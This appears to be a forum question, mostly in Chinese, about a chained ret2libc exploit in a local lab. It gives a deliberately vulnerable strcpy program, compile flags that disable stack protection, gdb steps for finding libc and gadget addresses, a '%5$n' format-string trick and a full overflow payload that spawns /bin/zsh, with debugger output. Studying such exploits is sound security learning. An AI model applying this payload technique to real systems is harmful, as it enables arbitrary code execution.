我正在尝试使用Chained ret2libc攻击来利用下面的代码。我正在尝试执行execl('/bin/zsh','/bin/zsh',NULL)功能。
要在execl的第3个参数中写NULL,我使用了printf(%5$n)。
代码:
int main(int argc, char *argv[]){
char buf[256];
printf("%p",buf);
strcpy(buf, argv[1]);
}
为此,我导出了2个ENV变量,例如:
user$ export SHELL='/bin/zsh'
user$ export test1='%5$n'
然后我编写了如下程序:
user$ gcc -ggdb -mpreferred-stack-boundry=2 -fno-stack-protector -fomit-frame-pointer -o vuln program.c
之后我用gdb打开了这个可执行文件:
user$ gdb -q vuln
gdb> break main
gdb> run test
gdb> STOPPED AT BREAKPOINT
gdb> print PRINTF --> got the address of this function
gdb> print EXECL --> got this address
gdb> print EXIT --> got this address too
要获取ENV变量的地址,我跑了
gdb> x/500s $esp --> kept pressing ENTER and got the address. I also got the exact address of String '/bin/zsh' instead of address of 'SHELL=/bin/zsh' by adding 6. Similarly got the addres of '%5$n'.
要获取POP - RET inst的地址,请运行objdump -D vuln | grep -A20 pop - >得到了一个pop-ret指令的地址。
所以对程序的输入如下:
“A”* 256 + printf_address + pop-ret地址+'%5 $ n'地址+ execl地址+退出地址+'/ bin / zsh'地址+'/ bin / zsh'地址+第3个参数地址。
我计算了第三个参数地址为base_address_of_buffer(由程序打印)+ 256 + 28(另外7个4字节块)
但是在运行这个程序之后,它会转到execl并给出一个错误,如下所示
以下是我得到的输入和输出:
(gdb) run $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/himmat/Desktop/vuln $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')
Breakpoint 1, main (argc=2, argv=0xbffff284) at chained_ret2libc.c:14
14 {
(gdb) cont
Continuing.
process 3720 is executing new program: /bin/zsh4
Breakpoint 1, 0x08053443 in main ()
(gdb) cont
Continuing.
/bin/zsh: can't open input file:
[Inferior 1 (process 3720) exited with code 0177]
(gdb)
要验证所有函数是否正在执行且第3个参数是否填充为NULL,请参阅下图。 Execution of program
